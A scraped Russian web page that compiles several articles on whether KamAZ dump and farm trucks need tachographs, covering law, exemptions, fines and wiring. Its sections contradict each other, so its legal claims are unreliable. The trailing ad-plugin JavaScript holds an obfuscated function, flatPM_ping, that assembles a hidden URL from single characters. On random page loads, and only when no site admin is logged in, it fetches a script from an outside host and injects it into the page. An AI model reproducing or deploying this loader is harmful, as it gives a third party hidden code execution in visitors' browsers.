Нужен ли тахограф на камаз сельхозник

Тахограф на КамАЗ: законодательство, покупка, установка

С 01.04.2015 все грузовики с полной массой свыше 3,5 тонн должны быть оснащены тахографами. Эта мера направлена на снижение аварийности движения, минимизацию нарушений ПДД и стимулирование водителей соблюдать режим отдыха. Если он не предусмотрен заводом-производителем, смонтировать тахограф на КамАЗ необходимо для его дальнейшей коммерческой эксплуатации.

Требования законодательства

Если грузовик числится на балансе юридического лица или частного предпринимателя, установка тахографа обязательна. Его отсутствие чревато штрафом до 10 тыс. рублей.

Но часто возникает вопрос, нужны ли тахографы на личном КамАЗе частника. По закону, при использовании грузовика в некоммерческих целях, установка устройства необязательна.

Наличие самосвала у фермера будет толковаться двойственно. С одной стороны, это транспорт для личных хозяйственных целей. С другой стороны, личное хозяйство – объект коммерческой деятельности. А значит, сотрудник ГИБДД имеет право зафиксировать нарушение, если тахограф отсутствует. Та же проблема касается владельцев самосвалов КамАЗ, в свободное время неофициально подрабатывающих вывозом строительного мусора.

Поэтому любому владельцу грузовых автомобилей КамАЗ рекомендуется его приобрести и установить. Иначе придется заплатить штраф 3 тыс. рублей, а факт некоммерческого использования грузовика затем доказывать в суде.

Аналоговые приборы, использовавшиеся на рейсовом транспорте до конца 1990-х годов, сегодня редкость. Его можно найти и поставить на старые самосвалы КамАЗ вместо штатного спидометра. Но стоит обратить внимание, что с 2018 года эксплуатация автомобилей с тахографами такого типа будет запрещена.

Поэтому лучше сразу установить цифровые приборы. Существуют два типа, соответствующих регламенту «О безопасности колесных транспортных средств»: международные и российские с системой СКЗИ.

Международные тахографы популярны среди владельцев самосвалов КамАЗ. К этой категории относятся модели DTCO1381, SE 5000, Efas 4.

Особенности эксплуатации международных тахографов:

  • водительская карточка меняется раз в три года;
  • раз в два года необходимо делать калибровку.
  • Тахографы с системой СКЗИ дополнительно защищены от внесения изменений в данные. К ним относятся модели АТОЛ Drive 5, ШТРИХ-ТахоRUS, Меркурий ТА-001. Их предпочитают крупные транспортные компании. В отличие от обычных, такой прибор нельзя установить самостоятельно.
  • Каждый блок СКЗИ находится на учете в ФСБ РФ, и его программирование осуществляется только на лицензированных станциях.

Особенности эксплуатации тахографов с СКЗИ:

  • водительская карточка меняется раз в три года;
  • калибровка раз в три года;
  • замена блока СКЗИ раз в 3 года + внеплановая при смене регистрационных знаков или собственника;
  • выезд за пределы РФ с таким тахографом запрещен;
  • при продаже ТС блок СКЗИ снимается и должен храниться 2 года.
  • Самостоятельная установка
  • Тахограф без СКЗИ можно установить самостоятельно и снизить общую стоимость оборудования. Главное, приобрести установочный комплект в лицензированном магазине и в дальнейшем там же зарегистрировать. В комплекте есть схема подключения.

Подготовка к установке зависит от модели и возраста КамАЗа. На самосвалах после 2006 года выпуска в верхней панели предусмотрено место 1din для тахографа. Иногда с протянутой проводкой, к ней достаточно просто подключиться. На старых моделях КамАЗ придется пожертвовать магнитолой или проявить фантазию. Также владельцам старых моделей придется поставить датчик скорости и спидометр нового типа. Крыша с плоской поверхностью, как на самосвале КамАЗ, идеальна для установки антенны.

Подключение электропроводки

Для самой сложной части работы понадобятся электросхемы, мультиметр, паяльник и термоусадочные трубки. Скрутки не допустимы: тряска и вибрации ухудшают контакт. Питание и общую массу желательно тянуть напрямую от АКБ.

Большинство тахографов имеет подключения:

  1. к кабелю замка зажигания для фиксации момента запуска двигателя;
  2. к проводам габаритов для автоматического включения подсветки дисплея;
  3. к датчику скорости (три провода: плюс, масса и сигнал управления);
  4. к спидометру (тахограф подключается «вразрез» линии от датчика скорости к спидометру);
  5. к доп.оборудованию (некоторые модели тахографов могут контролировать расход и уровень топлива, температуру, давление масла).

Установка тахографического оборудования на самосвалы КамАЗ необходимо согласно законодательству РФ. Без этого коммерческое использование грузовиков сегодня невозможно. Своевременное решение проблемы избавит от штрафов и вопросов от сотрудников ДПС.

Тахограф на самосвал

Вопрос о том, нужно ли ставить тахограф на самосвал, интересует многих владельцев такой техники. С точки зрения закона, все грузовые автомобили массой от 3.5 т должны оснащаться бортовыми самописцами, но при этом в нормативной базе есть и исключения. С точки зрения закона тахограф на самосвал необходимо монтировать почти в 100% случаев. Исключения встречаются редко, и о них, а также о том, где можно оснастить ТС тахографом, мы расскажем в нашем обзоре.

Тахограф на самосвал согласно закону

Чтобы определить нужен ли самосвалам тахограф необходимо провести анализ нормативной базы. Законы и другие документы, принятые в РФ, строго регламентируют оборудование транспортных средств приборами для регистрации параметров движения. В этой отрасли основными документами будут:

  • Регламент Таможенного Союза 018/2011, в котором содержатся требования к конструкции колесных ТС.
  • Федеральный закон №196 (в редакции от 26.07.2017) «О безопасности дорожного движения», который обязывает владельцев автомобилей оснащать их бортовыми самописцами.
  • Приказ МинТранса РФ №237 от 21.08.13, определяющий, какими именно приборами оснащаются машины, выполняющие коммерческие рейсы (связанные с перевозкой грузов и/или пассажиров).

Под действие этих и других нормативов попадают грузовики с массой от 3500 кг и более. Вес всех моделей самосвалов превышает это значение, так что действие закона распространяется и на них.

Какие автомобили не требуют оснащения тахографом?

Если в законах все прописано достаточно подробно, то почему же возникает вопрос о целесообразности оснащения самосвалов тахографами? Связано это с наличием ряда исключений – сами нормативы содержат список техники, на которую регистрирующие приборы владелец может ставить добровольно, и их наличие никак не контролируется. Первую группу исключений составляет техника, которая принадлежит вооруженным силам Российской Федерации, МВД, ФСБ и другим силовым структурам. В этот перечень также включают самоходные тягачи, трактора и другую спецтехнику. Прошедшую регистрацию в Гостехнадзоре. Вторая группа – это специализированные ТС, которые задействуются в строительных, ремонтных или дорожных работах. Сюда относятся бетононасосы, краны, эвакуаторы и гудронаторы на колесных платформах, а также другая техника, используемая коммунальными структурами (снегоочистители, машины для мойки дорог и т.д.). Кроме этих категорий в список исключений попали также:

  • Машины скорой помощи и их аналоги (передвижные лаборатории и медицинские комплексы).
  • Пожарные машины.
  • ТС, задействованные во внутрихозяйственных перевозках с/х сырья.
  • Автомобили, переоборудованные под транспортировку специфических грузов (цистерны для рыбы, молока, зерна, скотовозы).

Почему самосвал не попал в список исключений?

В отличие от присутствующей в списке исключений спецтехники, самосвал (грузовой автомобиль с особой конструкцией кузова) нужно оснащать тахографом обязательно. Связано это с тем, что его параметры (масса и назначение) попадают под действие нормативов. Кроме того, в отличие от специализированных грузовиков, самосвал отличается высокой универсальностью, потому может использоваться для перевозки различных грузов на большие расстояния.

Таким образом, на любой самосвал, который используется в коммерческой деятельности, нужно обязательно ставить бортовой самописец установленного образца (цифровую модель с криптозащитным модулем СКЗИ). Если же такая техника находится в собственности частного лица, то ее переоснащение не будет обязательным. Но при проверке сотрудниками ДПС или других контролирующих органов придется доказывать, что такой специфический автомобиль как самосвал вы не используете в коммерческой деятельности.

Где установить тахограф на самосвал?

Самостоятельное оснащение ТС бортовым самописцем невозможно. Монтировать такие устройства может только сотрудник организации, имеющей разрешение на этот вид деятельности. В том числе лицензию ФСБ РФ на работу с модулями криптозащиты информации. Установить тахограф на самосвал вы можете в нашей компании. При этом мы гарантируем быстрый монтаж оборудования по всем правилам, и строгое соблюдение требований к оформлению документации — а это значит, что переоборудованная машина без проблем пройдет самую строгую проверку.

На какие автомобили не надо устанавливать тахографы?

Добрый день, уважаемый читатель.

Тахограф — специальный прибор, который контролирует соблюдение режима труда и отдыха водителями транспортных средств.

Изначально установка тахографов преследует хорошую цель — предотвращение ДТП, вызванных усталостью водителей, работающих без перерыва в течение десятков часов.

Однако на практике владельцы транспортных средств пытаются избежать установки контрольного оборудования. Связано это с тем, что стоимость установки тахографа на грузовой автомобиль достигает нескольких десятков тысяч рублей и это весьма внушительная сумма.

В этой статье Вы узнаете:

Ниже Вы узнаете, на какие автомобили можно не устанавливать тахографы на вполне законных основаниях. Приступим.

Документ, который регламентирует вопрос установки тахографов — приказ министерства транспорта Российской Федерации «Об утверждении требований к тахографам, устанавливаемым на транспортные средства, категорий и видов транспортных средств, оснащаемых тахографами, правил использования, обслуживания и контроля работы тахографов, установленных на транспортные средства», приложение №2 «Категории и виды транспортных средств, оснащаемых тахографами».

Для чего нужен тахограф?

Тахограф предназначен для того, чтобы фиксировать время, которое водитель затратил на управление автомобилем, другие работы и перерывы. Данный прибор сохраняет историю рабочего дня, к которой имеют доступ сотрудники контролирующих органов.

То есть в целом тахограф нужен для контроля соблюдения режима труда и отдыха водителем.

На какие автомобили нужен тахограф?

Тахографы должны устанавливаться на следующие виды транспортных средств:

  • Автобусы (транспортные средства, имеющие более восьми мест для сидения и используемые для перевозки пассажиров);
  • Грузовики тяжелее 3,5 тонн.

Так что теперь Вы можете легко дать ответ на вопрос, нужен ли тахограф на грузовую газель. Поскольку разрешенная максимальная масса такого автомобиля не превышает 3,5 тонны, тахограф устанавливать не нужно.

На какие автомобили не надо устанавливать тахографы?

Обратите внимание, есть перечень исключений, т.е. автобусов и грузовиков, на которые не нужно ставить тахографы:

  • Троллейбусы;
  • Автомобили, осуществляющие международные перевозки и оборудованные тахографами «Европейского образца»;
  • Военные транспортные средства;
  • Автомобили органов, осуществляющих оперативно-розыскную деятельность (полиции, ФСБ, ФСИН и т.д);
  • Автомобили, зарегистрированные в гостехнадзоре (трактора и самоходные машины);
  • Автомобили старше 30 лет, не предназначенные для коммерческих перевозок (в отношении которых не уплачивается утилизационный сбор);
  • Учебные автомобили, не используемые для коммерческих перевозок;
  • Автомобили, проходящие дорожные испытания.

Обратите внимание, ранее в этом списке также присутствовали автобусы, осуществляющие городские и пригородные регулярные перевозки. Однако с 20 ноября 2017 года эти транспортные средства не входят в список исключений.

Кроме перечисленных выше транспортных средств, есть и еще один список исключений (по типу выполняемых работ):

  • Автобетононасосы;
  • Автобенотосмесители;
  • Автогудронаторы;
  • Автокраны;
  • Автомобили скорой помощи;
  • Эвакуаторы;
  • Пожарные автомобили;
  • Транспортные средства для коммунального хозяйства и содержания дорог;
  • Автомобили для обслуживания нефтяных и газовых скважин;
  • Автомобили инкассации (для перевозки денег и ценных грузов);
  • Транспортные средства, оснащенные подъемниками с рабочими платформами;
  • Медицинские комплексы на шасси транспортных средств;
  • Автолавки;
  • Автобусы для ритуальных услуг;
  • Автомобили-дома;
  • Бронированные транспортные средства;
  • Специализированные транспортные средства (специально оборудованные молоковозы, скотовозы, машины для перевозки птицы, яиц, живой рыбы, машины для перевозки и внесения минеральных удобрений);
  • Грузовики категории С, используемые сельскохозяйственными товаропроизводителями при осуществлении внутрихозяйственных перевозок (перевозка в пределах границ муниципального района, на территории которого зарегистрированы транспортные средства, а также граничащих с ним муниципальных районов);
  • Специальные транспортные средства;
  • Передвижные лаборатории и мастерские;
  • Передвижные телевизионные студии.

В данный перечень попадают многие специализированные транспортные средства. На них можно не устанавливать тахографы и это не повлечет штраф.

Нужен ли тахограф на самосвал?

Самый популярный тип грузовиков, задействованный в строительных работах, — это самосвал. Рассмотрим, нужен ли тахограф на самосвал Камаз.

С одной стороны, если самосвал используется строительной компанией, возводящей жилые дома, то тахограф ему однозначно нужен.

С другой стороны, если Камаз используется для коммунального хозяйства, то у его владельца возникают обоснованные вопросы. Можно ли не не устанавливать тахограф в этом случае?

Обратите внимание, сотрудники ГИБДД во многих регионах трактуют приведенный выше список исключений следующим образом. К автомобилям для коммунального хозяйства и содержания дорог относятся только транспортные средства, имеющие специализированное предназначение. То же самое касается автомобилей для обслуживания газовых и нефтяных скважин.

В соответствии с этой трактовкой ГИБДД не требует устанавливать тахографы, например, на автомобили, оборудованные щетками для очистки дорог. Однако на самосвалы, используемые в коммунальном хозяйстве, ГИБДД требует ставить тахографы и накладывает штрафы за их отсутствие.

Нужен ли тахограф на личный грузовик?

До 1 ноября 2019 года установка тахографов была обязательна только для транспортных средств, используемых юридическими лицами и индивидуальными предпринимателями. Т.е. частникам тахограф бы не нужен.

Однако с 1 ноября 2019 года в закон «О БДД» добавлен следующий пункт:

3. Физические лица, осуществляющие эксплуатацию грузовых автомобилей, разрешенная максимальная масса которых превышает 3500 килограммов, и автобусов, обязаны:
.
обеспечивать оснащение эксплуатируемых ими транспортных средств тахографами. Требования к тахографам, а также порядок оснащения тахографами, правила их использования, обслуживания и контроля их работы устанавливаются в порядке, определенном в соответствии с абзацем десятым пункта 1 настоящей статьи;

Таким образом, с 1 ноября 2019 года тахограф нужен в том числе на личные грузовые автомобили категории С и личные автобусы.

Нужен ли тахограф при коммерческих перевозках на личном автомобиле?

Достаточно распространенный вопрос. Водитель покупает грузовой автомобиль или автобус для осуществления коммерческих перевозок, но не собирается регистрировать ИП или юридическое лицо. Нужен ли в этом случае тахограф?

Начиная с 1 ноября 2019 года вопрос решается довольно легко, т.к. тахографы должны устанавливаться на все грузовые автомобили категории С и автобусы категории D. То есть не имеет значения, кто является собственником.

Кроме того, в описанной выше ситуации водителю грозит и наказание за другое нарушение — осуществление предпринимательской деятельности без государственной регистрации (статья 14.1 КоАП):

1. Осуществление предпринимательской деятельности без государственной регистрации в качестве индивидуального предпринимателя или без государственной регистрации в качестве юридического лица —

влечет наложение административного штрафа в размере от пятисот до двух тысяч рублей.

Размер этого штрафа сопоставим со штрафом за отсутствие тахографа.

Нужно ли менять аналоговый тахограф (шайбу) на цифровой?

Начиная со 2 марта 2018 года использование аналоговых тахографов не допускается. Их нужно заменить на цифровые, имеющие в своем составе блок СКЗИ.

Нужен ли тахограф на камаз самосвал?

Вы узнаете, Надо ли ставить тахограф на личный грузовой автомобиль, как например на камаз самосвал, сельхозник, зерновоз, ЗИЛ, ИП. Читайте комментарии специалистов.

Ответ:

Нужен ли тахограф на самосвал Камаз, зерновоз или сельхозник? Да, наличие этой техники сейчас стало обязательным требованием для всего пассажирского и грузового коммерческого транспорта. ФЗ №196 – закон, где это требование впервые было прописано максимально чётко.

Но есть ещё и определённые требования относительно правил использования данных устройств, их компонентов. Датчик движения и карта должны присутствовать в обязательном порядке. Для приёма сигналов ГЛОНАСС и GPS используются специальные модули. Эту функцию могут выполнять и отдельные разновидности антенн.

Корпус должен быть полностью опломбирован, защищён от возможного взлома. Криптографическое и программное обеспечение должны стоять как можно более новых версий. Карта движения вставляется перед тем, как водитель начинает свою работу. Тогда он вводит специальный PIN-код. Прибор может регистрировать информацию о текущем местоположении автоматически, либо она вводится вручную.

Тахографы должны находиться на грузовом и пассажирском коммерческом транспорте, который относится к категории N2, N3, M2, M3. Но, если автобус осуществляет регулярные городские и пригородные перевозки, на него тахограф не ставится. Это касается и транспортных средств, допущенных к международным перевозкам. В этом случае контрольно-измерительные аппараты устанавливаются ещё на заводе изготовителя.

Нужен ли тахограф на самосвал зил? Подробные ответы.

Нужен ли тахограф на самосвал ЗИЛ? Да, эти транспортные средства подпадают под общие правила, как и любые самосвалы вообще, вес которых составляет от 12 до 15 тонн, от 3,5 до 12 тонн.

Ип тахограф не нужен, если транспорт используется только в личных нуждах. А вот, если осуществляется деятельность коммерческая, без установки устройства никак не обойтись.

Легализация считается одним из главных аргументов за обязательное внедрение тахографов. Только на юридических лиц и индивидуальных предпринимателей может осуществляться активизация блока СКЗИ. Многие считают, что именно введение тахографов позволит бизнесу по грузоперевозкам выйти из тени.

В дальнейшем это капиталовложение обернётся для всех серьёзной экономией. Прежде всего, можно будет сменить оплату труда водителей. Ведь благодаря этим приборам их время фиксируется максимально точно, вплоть до последних секунд.

Ускорения и их плавность, количество торможений – в тахографе находят отражение даже такие точные данные. Это помогает в оценке профессиональных навыков сотрудника. Из-за низкой квалификации зачастую увеличивается расход материалов, износ деталей и механизмов. Наконец, данные, которые были зафиксированы таким образом, могут служить отличным доказательством в суде, если это будет нужно.

Надо ли ставить тахограф на личный грузовой автомобиль?

Надо ли ставить тахограф на личный грузовой автомобиль? Для начала стоит разобраться в том, в каких случаях наличие устройства вообще не обязательно.

Без него могут обойтись транспорт для пассажирских и пригородных перевозок, который проходит не больше 50 километров. Но обязательно иметь номер маршрута. Специальная техника тоже вполне может обойтись без данного прибора. Если все условия соблюдаются, и транспортному средству уже более 30 лет, то тахограф тоже становится не нужным.

Если прибора нет, сотрудники государственных служб могут лишить права управлять им. Прибор имеет специальный кодированный датчик считывания скорости, который и передаёт всю необходимую информацию. Тахограф автоматически активируется, как только поворачивается ключ зажигания.

Для установки доступны две разновидности устройства, которые относятся к цифровому типу. Например, есть европейские модели, которые устанавливаются на большей части машин из стран Европы. А ещё можно выбрать вариант, где есть так называемый СКЗИ – специальный блок, отвечающий за криптозащиту.

Установку прибора можно осуществить самостоятельно, но важно соблюдать инструкцию по монтажу.

Нужен ли тахограф на камаз 55102 сельхозник?

Похожие темы

Категории и виды

транспортных средств, оснащаемых тахографами

(утв. приказом Минтранса РФ от 13 февраля 2013 г. N 36)

С изменениями и дополнениями от:

17 декабря 2013 г.

Тахографами оснащаются следующие категории и виды транспортных средств, выпускаемые в обращение и находящиеся в эксплуатации на территории Российской Федерации:

транспортные средства, используемые для перевозки пассажиров, имеющие, помимо места водителя, более восьми мест для сидения, максимальная масса которых не превышает 5 тонн (категория );

транспортные средства, используемые для перевозки пассажиров, имеющие, помимо места водителя, более восьми мест для сидения, максимальная масса которых превышает 5 тонн (категория );

транспортные средства, предназначенные для перевозки грузов, имеющие максимальную массу свыше 3,5 тонн, но не более 12 тонн (категория );

транспортные средства, предназначенные для перевозки грузов, имеющие максимальную массу более 12 тонн (категория );

транспортных средств категории , осуществляющих городские и пригородные регулярные перевозки в соответствии Правилами перевозок пассажиров и багажа автомобильным транспортом и городским наземным электрическим транспортом, утвержденными постановлением Правительства Российской Федерации от 14 февраля 2009 г. N 112*;

транспортных средств, допущенных к осуществлению международных автомобильных перевозок в соответствии с карточкой допуска на автотранспортное средство для осуществления международных автомобильных перевозок грузов и пассажиров (приказ Минтранса России от 22 ноября 2004 г. N 36 «Об утверждении форм бланков лицензий, лицензионных карточек, удостоверений допуска и карточек допуска» (зарегистрирован Минюстом России 17 декабря 2004 г., регистрационный N 6204), оснащаемых контрольными устройствами в соответствии с требованиями Европейского соглашения, касающегося работы экипажей транспортных средств, производящих международные автомобильные перевозки (ЕСТР, Женева, 1 июля 1970 г.);

пассажирских и грузовых троллейбусов;

автобетононасосов, автобетоносмесителей, автогудронаторов, автокранов и транспортных средств, оснащенных кранами-манипуляторами, автомобилей скорой медицинской помощи, автоэвакуаторов, пожарных автомобилей, транспортных средств для коммунального хозяйства и содержания дорог, транспортных средств для обслуживания нефтяных и газовых скважин, транспортных средств для перевозки денежной выручки и ценных грузов, транспортных средств, оснащенных подъемниками с рабочими платформами, медицинских комплексов на шасси транспортных средств, автолавок, автобусов для ритуальных услуг, автомобилей-домов, бронированных транспортных средств, самоходных сельскохозяйственных машин, передвижных лабораторий и мастерских, передвижных репортажных телевизионных студий;

транспортных средств, зарегистрированных военными автомобильными инспекциями или автомобильными службами федеральных органов исполнительной власти, в которых федеральным законом предусмотрена военная служба;

транспортных средств органов, осуществляющих оперативно-розыскную деятельность;

транспортных средств, зарегистрированных органами, осуществляющими государственный надзор за техническим состоянием самоходных машин и других видов техники;

транспортных средств, включенных в перечень видов и категорий колесных транспортных средств, с года выпуска которых прошло 30 и более лет, которые не предназначены для коммерческих перевозок пассажиров и грузов, имеют оригинальный двигатель, кузов и раму (при наличии), сохранены или отреставрированы до оригинального состояния, и в отношении которых утилизационный сбор не уплачивается, утвержденный постановлением Правительства Российской Федерации от 30 августа 2012 г. N 870 «Об утилизационном сборе в отношении колесных транспортных средств»**;

находящихся в эксплуатации автобусов с числом мест более 20 и грузовых автотранспортных средств с полной массой свыше 15 тонн, предназначенных для междугородных и международных перевозок, оснащенных до 8 ноября 2013 г. при изготовлении тахографами в соответствии с постановлением Правительства Российской Федерации от 3 августа 1996 г. N 922 «О повышении безопасности междугородных и международных перевозок пассажиров и грузов автомобильным транспортом».

* Собрание законодательства Российской Федерации, 2009, N 9, ст. 1102; 2011, N 37, ст. 5268.

** Собрание законодательства Российской Федерации, 2012, N 36, ст. 4919; 2013, N 26, ст. 3342.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}